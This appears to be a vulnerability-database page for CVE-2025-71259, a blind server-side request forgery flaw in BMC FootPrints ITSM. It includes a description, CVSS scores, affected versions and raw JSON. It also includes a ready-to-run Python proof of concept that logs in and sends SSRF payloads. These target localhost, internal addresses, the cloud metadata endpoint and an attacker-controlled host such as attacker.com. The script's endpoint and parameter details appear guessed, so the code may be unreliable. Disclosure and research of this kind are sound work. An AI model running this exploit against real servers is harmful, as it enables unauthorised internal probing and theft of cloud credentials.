Security Vulnerability Report
CVE-2025-71259 CVSS 4.3 MEDIUM

CVE-2025-71259

Published: 2026-03-19 14:16:13
Last Modified: 2026-04-22 17:36:55

Description

BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a blind server-side request forgery vulnerability in the externalfeed/RSS API component that allows authenticated attackers to trigger arbitrary outbound requests from the server. Attackers can exploit insufficient validation of externally supplied resource references to interact with internal services or cause resource exhaustion impacting availability. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:bmc:footprints_itsm:*:*:*:*:*:*:*:* - VULNERABLE
BMC FootPrints ITSM 20.20.02
BMC FootPrints ITSM versions before 20.20.03.002
BMC FootPrints ITSM versions before 20.21.01.001
BMC FootPrints ITSM versions before 20.21.02.002
BMC FootPrints ITSM 20.22.01
BMC FootPrints ITSM versions before 20.22.01.001
BMC FootPrints ITSM 20.23.01
BMC FootPrints ITSM versions before 20.23.01.002
BMC FootPrints ITSM versions before 20.24.01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-71259 BMC FootPrints ITSM Blind SSRF PoC
# Target: externalfeed/RSS API endpoint
# Authentication required (low-privilege user)


def exploit_ssrf(target_url, attacker_server, credentials):
    """
    Exploit blind SSRF in BMC FootPrints ITSM externalfeed/RSS API

    Args:
        target_url: Base URL of BMC FootPrints ITSM (e.g., https://target.com)
        attacker_server: Attacker's controlled server to receive requests
        credentials: Dict with 'username' and 'password'
    """
    session = requests.Session()

    # Step 1: Authenticate with low-privilege account
    login_url = f"{target_url}/GoIn/LogIn.dll?R=1"
    login_data = {
        'username': credentials['username'],
        'password': credentials['password']
    }

    print(f"[*] Authenticating as {credentials['username']}...")
    response = session.post(login_url, data=login_data)

    if response.status_code != 200:
        print("[-] Authentication failed")
        return False

    print("[+] Authentication successful")

    # Step 2: Exploit SSRF via externalfeed/RSS API
    ssrf_url = f"{target_url}/externalfeed/RSS"

    # Internal service probing (SSRF payload examples)
    payloads = [
        "http://localhost:80/",
        "http://127.0.0.1:8080/",
        "http://169.254.169.254/latest/meta-data/",  # Cloud metadata
        f"http://{attacker_server}/",
        "http://192.168.1.1:80/"
    ]

    print(f"[*] Sending SSRF payloads to {ssrf_url}...")

    for payload in payloads:
        params = {'url': payload}
        try:
            # The SSRF is blind: the response body does not reflect the fetched resource
            response = session.get(ssrf_url, params=params, timeout=10)
            print(f"[+] Payload sent: {payload}")
        except requests.exceptions.Timeout:
            print(f"[!] Timeout for payload: {payload} (may indicate successful SSRF)")
        except Exception as e:
            print(f"[-] Error with payload {payload}: {e}")

    print("[*] SSRF exploitation completed")
    print("[*] Check attacker_server logs for incoming requests from target")
    return True


if __name__ == "__main__":
    # Four positional arguments are required, so argv must hold five entries
    if len(sys.argv) < 5:
        print("Usage: python cve-2025-71259.py <target_url> <attacker_server> <username> <password>")
        print("Example: python cve-2025-71259.py https://footprints.example.com http://attacker.com:8080 user pass")
        sys.exit(1)

    target = sys.argv[1]
    attacker = sys.argv[2]
    creds = {'username': sys.argv[3], 'password': sys.argv[4]}

    exploit_ssrf(target, attacker, creds)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71259", "sourceIdentifier": "[email protected]", "published": "2026-03-19T14:16:13.380", "lastModified": "2026-04-22T17:36:55.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a blind server-side request forgery vulnerability in the externalfeed/RSS API component that allows authenticated attackers to trigger arbitrary outbound requests from the server. Attackers can exploit insufficient validation of externally supplied resource references to interact with internal services or cause resource exhaustion impacting availability. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01."}, {"lang": "es", "value": "Las versiones 20.20.02 a 20.24.01.001 de BMC FootPrints ITSM contienen una vulnerabilidad de falsificación de petición del lado del servidor ciega en el componente API externalfeed/RSS que permite a atacantes autenticados activar peticiones salientes arbitrarias desde el servidor. Los atacantes pueden explotar la validación insuficiente de referencias de recursos suministradas externamente para interactuar con servicios internos o causar agotamiento de recursos que afecte la disponibilidad. 
Los siguientes hotfixes remedian la vulnerabilidad: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002 y 20.24.01."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", 
"privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bmc:footprints_itsm:*:*:*:*:*:*:*:*", "versionStartIncluding": "20.20.02", "versionEndIncluding": "20.24.01.001", "matchCriteriaId": "847E5686-7CB0-4A4F-952D-E3D9D2CF7BE8"}]}]}], "references": [{"url": "https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/Release-notes/2024-Release-01-Patch-2/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/bmc-footprints-itsm-blind-ssrf-in-externalfeed-rss", "so ... (truncated)